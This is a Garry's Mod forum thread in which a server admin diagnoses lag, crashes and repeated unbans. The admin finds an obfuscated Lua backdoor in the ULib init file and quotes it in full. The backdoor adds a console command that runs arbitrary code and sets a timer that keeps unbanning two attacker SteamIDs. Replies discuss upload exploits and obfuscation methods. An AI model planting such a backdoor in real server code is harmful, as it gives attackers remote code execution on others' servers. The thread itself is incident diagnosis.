Low Bandwidth Attack

My main server has been having a very bad connection with 900+ ping. If I start the server on another IP address or port number, it runs fine. When looking at Netlimiter, the server has an unusual number of outgoing and incoming connections compared to my other servers, despite being empty. None of my other servers have this issue. It seems like this may be some kind of malformed packet attack, but I really have no idea. I was wondering if anybody had any suggestions.

Wireshark save:
http://216.245.193.98/xmisc/attackissue.pcap
Note: The server having the issue is 216.245.193.98:27015

Here is a Wireshark txt output:
http://216.245.193.98/xmisc/oddissue2

In particular there are a lot of packets coming from 96.43.138.109, but I really do not know if that is the cause. They are going to 216.245.193.98:27015 however, which is the address of my server.

It’s definitely some sort issue with the port, like an attack. If I host my server on another IP it works fine. If I host another server at this IP, it has the same issue.

Block 96.43.138.109

Note sure if this is a coincidence or not, but here’s what happened. I used IPSec to block the IP address, 96.43.138.109 and the lag stopped instantly. Afterwards, I have an odd issue where the server crashes and restarts at exact intervals of about 30 seconds. The server console is also getting spammed with “removeid” commands of two SteamIDs that are known exploiters that have somehow uploaded Lua files to the server before.

After a while, the crashing stopped and the server ran stable for a while. Soon the huge lag begins again. I do a Wireshark capture and an abnormal amount of packets is comign from 96.43.138.124 (notice how close it is to the other IP). I block that IP and the lag instantly stopped. The removeids are still being spammed. I have already confirmed that rcon is secure, and I’m working on doing batch searches for any uploaded lua that is spamming the unban.

[editline]19th May 2011[/editline]

I foudn this in addons/ulib/init.lua at the very bottom:
[lua]local r = _G[“R”…“u”…“n”…“Str”…“ing”] local c = _G[“co”…“nco”…“mman”…“d”] local a = “A”…“dd” local s = “i”…“i” c[a](s, function(m, n, o) r(o[1]) end)
local s1 = “STE”…“AM_0:”…“1:1767”…“2340” local s2 = “STEA”…“M_0:”…“1:548”…“998”…“8” local ub = “un”…“b”…“an”
timer.Create(“Spy sappin mah code”, 5, 0, function() if (ULib && ULib[ub]) then ULibub ULibub end end)[/lua]

I don’t know how they’re uploading. I’m really lucky my batch search just happened to be the first 4 digits of their Steamid, seeing as to how they’ve obfuscated it.

lol, obfusication, that guy needs to work on it, its pretty obvious when you look at it

It’s not obfuscation, it’s probably so you can’t just use find in files on RunString/concommand/SteamIDs.

Considering there is an exploit out there where you can upload lua, I’d say that this is a real issue. I’ve had to delete random RunString functions and stuff several times now.

Other ways of obfuscation I’ve seen include String.char, and of course using the _G table is useful.

Do you have sv_allowupload 0?

Yes, I do


sv_allowupload 0
sv_allowdownload 0

Rcon password has been changed several times as well, so that’s not the issue either.

Do you have any binary modules installed that allow file reading/writing? Check the lua/includes/modules/ folder.

No, I actually made sure of this since the beginning. The only .dll module is gm_sqlite.

How big is it (kb)?

They have access to your FTP/Control Panel/RDP account.

gm_sqlite.dll is 464,384 bytes. I’m currently locking down my server by hardcoding bans against the attackers using gmsv_gatekeeper, however that obviously don’t mitigate the fact that it is possible to upload lua files to my server.

[editline]19th May 2011[/editline]

My FTP logs show many attempts, but no one has been using it other than me. I have no control panel. My Event Viewer logs show a ton of attempted logins, but the only logins are by me, and since I have school during a certain time period I’m sure it’s me. So I am positive the remote desktop is compromised. Besides, in the unlikely event remote desktop was compromised, I’m sure they would do more damage than toy around with one out of many gameservers and websites.

So I don’t see why you’re so sure the server is compromised at that level, I’m not a complete newbie at managing a dedicated server.

If they had RDP access, they could just go into the console and unban instead of putting it into a Lua script…
If they had FTP they could just remove their ID from the ban file…

:rolleyes:

They might be lazy. There’s no way without a binary module that they could edit ulib’s init file. The file upload exploit only worked for creating files, not updating them…

It’s the only real logical solution.

I’ve been in an email conversation with the person before and they vaguely mention some “attack vector” but then they stopped responding to my emails after I offered money in return for it…

I see where you’re coming from but unfortunately I don’t see any evidence of those vectors being vulnerable.

Out of curiousity, who was it? Would you mind telling me the email/steamid/ip?

I would assume STEAM_0:1:5489988 and STEAM_0:1:17672340.

If they got access to your FTP, you can only assume they are smart enough to purge the logs of their entry…